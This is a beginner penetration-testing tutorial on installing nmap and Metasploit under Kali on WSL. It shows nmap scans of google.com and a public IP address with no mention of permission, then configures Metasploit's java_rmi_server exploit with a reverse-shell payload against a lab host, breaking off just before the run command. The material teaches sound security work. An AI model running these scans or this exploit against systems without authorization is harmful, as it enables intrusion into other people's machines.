Nothing here =)
In penetration testing, a wide range of tools are used. For our purposes, we’ll be focusing these two: nmap and Metasploit.
This guide will demonstrate how to install these tools, particularly through the Kali Linux distribution. Kali Linux can be easily set up on Windows 10 or 11 using the Windows Subsystem for Linux (WSL).
Kali Linux is a Linux distribution specifically designed for penetration testing. It comes pre-installed with many standard tools required for this purpose.
Nmap is an enumeration tool used to scan IP addresses and ports. Its primary objective is to identify the attack surface of a target.
Metasploit, specifically msfconsole, is a command-line tool that provides a wide range of vulnerabilities. It includes auxiliary scanners as well as working vulnerabilities that can be exploited on various servers.
There are several methods to access these tools on your computer. We recommend installing WSL with Kali Linux either with a GUI or the regular way and accessing Kali from a terminal interface. Both methods are described below.
Ensure that you run PowerShell as an administrator before starting the installation.
You might encounter an issue where hardware virtualization needs to be enabled. Refer to the following resources for more information:
If you already have Debian, Ubuntu, or another Linux distribution set up, that should be sufficient. However, Kali Linux is the recommended distribution for penetration testing, so we’ll be installing that.
Follow the instructions provided on kali.org: WSL Preparations
The following video demonstrates similar steps that should be easy to follow:
While Kali Linux comes with many tools pre-installed, WSL has minimal packages installed by default. It’s recommended to install some basic tools before getting started:
sudo apt-get update -y
sudo apt-get upgrade -y
sudo apt-get install vim -y # Not necessary
sudo apt-get install git -y # Not necessary
sudo apt-get install ruby-full # Required for Metasploit
To install nmap on your Kali Linux (either virtual or real), run the following command in the terminal:
sudo apt-get install nmap -y
You can test if nmap is working by running nmap google.com and checking the output:
└─$ nmap google.com
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-09 13:04 CEST
Nmap scan report for google.com (142.250.74.78)
Host is up (0.015s latency).
Other addresses for google.com (not scanned): 2a00:1450:400f:802::200e
rDNS record for 142.250.74.78: arn09s23-in-f14.1e100.net
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 4.08 seconds
Run the following command to install Metasploit-Framework:
sudo apt-get install metasploit-framework postgresql -y
After the installation is complete, you can open Metasploit-Framework. It will display some ASCII art at startup, and you should see the prompt msf6>.
└─$ msfconsole
.;lxO0KXXXK0Oxl:.
,o0WMMMMMMMMMMMMMMMMMMKd,
'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
:KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit
=[ metasploit v6.3.19-dev ]
+ -- --=[ 2318 exploits - 1215 auxiliary - 412 post ]
+ -- --=[ 1234 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use sessions -1 to interact with the
last opened session
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
Nmap is a powerful tool with extensive functionality. In this guide, we will cover the basics.
By default, running nmap on any IP address will scan the 1,000 most common ports for each protocol.
nmap 217.114.85.70
You can specify which ports to scan. For example, to scan all possible ports:
nmap -p1-65535 217.114.85.70
Scanning all ports can take some time. To speed it up, you can use the -n flag to disable DNS resolution:
nmap -p1-65535 -n 217.114.85.70
Another useful flag is -A to “Enable OS detection, version detection, script scanning, and traceroute” providing valuable information:
nmap -A 217.114.85.70
-sV is another useful flag: “Probe open ports to determine service/version info”.
nmap -sV 217.114.85.70
Different flags can be combined to enhance scanning capabilities:
nmap -sV -A -p1-65535 217.114.85.70
Nmap also offers various scripts that you can use. For example, if you have found a Windows server with an SMB port 445, you can use the smb-os-discovery script to find out the exact version of Windows.
nmap --script=smb-os-discovery -p 445 217.114.85.70
One popular vulnerability scanning script is available at: https://github.com/vulnersCom/nmap-vulners. Here is an example of a previous scan on an HTTPS server with several vulnerabilities:
nmap --script vulners -sV 192.168.56.108
All scripts are located under /usr/share/nmap/scripts/. You can create your own scripts or download scripts and place them in that directory.
To start the Metasploit console, enter the following command:
msfconsole
Once the console is open, you will have access to various tools. You can search for specific tools based on your requirements. For example, if you’re attacking an Apache server, you can search for available tools:
search apache
The search will provide multiple results. You can narrow down the search to find the desired tool. The tools in Metasploit come in two main categories: scanners and exploits. Scanners are similar to nmap but usually more specialized, while exploits can perform actions like memory dumping and gaining a reverse shell.
Let’s take an example of using the java_rmi_server module. First, enter use <module>:
msf6 > use multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) >
To view the options for the module, use the info command. It will provide detailed information, including a description. You can also use show options which gives you the essential information needed to run the module. From there, you can identify any missing settings:
msf6 exploit(multi/misc/java_rmi_server) > show options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasplo
it.html
RPORT 1099 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine
or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.19.119.45 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
View the full module info with the info, or info -d command.
Typically, the RHOSTS and RPORT settings are required. If RPORT is already set, you can proceed to set the RHOSTS. Here’s a helpful tip: Use setg to set the values globally. This way, the settings will be saved when switching between modules:
msf6 exploit(multi/misc/java_rmi_server) > setg RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
You can select different payloads depending on the context. In general, you don’t change the exploit itself, but rather the code it uses to establish a reverse shell:
msf6 exploit(multi/misc/java_rmi_server) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_aws_ssm normal No Command Shell, Bind SSM (via AWS API)
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/ssh/interact normal No Interact with Established SSH Connection
5 payload/java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline
6 payload/java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline
7 payload/java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager
8 payload/java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager
9 payload/java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager
10 payload/java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager
11 payload/java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager
12 payload/java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager
13 payload/java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline
14 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
15 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
payload/generic/shell_reverse_tcp looks fun! Lets use it.
msf6 exploit(multi/misc/java_rmi_server) > set payload 3
payload => generic/shell_reverse_tcp
Finally, you can run the exploit using the exploit command (or run):
